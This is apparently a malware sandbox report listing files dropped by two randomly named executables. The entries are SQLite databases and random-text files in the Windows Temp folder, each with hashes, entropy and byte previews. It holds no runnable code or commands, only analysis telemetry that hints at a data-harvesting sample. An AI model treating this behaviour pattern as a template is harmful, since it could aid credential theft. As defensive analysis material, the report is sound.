                    Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                    C:\Users\user\AppData\Local\Temp\tmpC018.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC028.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC048.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC059.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC73F.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC750.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC770.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC781.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC9F6.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.696508269038202
                    Encrypted:false
                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                    Malicious:false
                    Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                    C:\Users\user\AppData\Local\Temp\tmpCA07.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.704346314649071
                    Encrypted:false
                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                    Malicious:false
                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                    C:\Users\user\AppData\Local\Temp\tmpCA18.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.701195573484743
                    Encrypted:false
                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                    MD5:2530C45A92F347020337052A8A7D7B00
                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                    Malicious:false
                    Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                    C:\Users\user\AppData\Local\Temp\tmpCA19.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.696508269038202
                    Encrypted:false
                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                    Malicious:false
                    Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                    C:\Users\user\AppData\Local\Temp\tmpD01B.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD02C.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD03D.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD03E.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD04E.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD05F.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD060.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
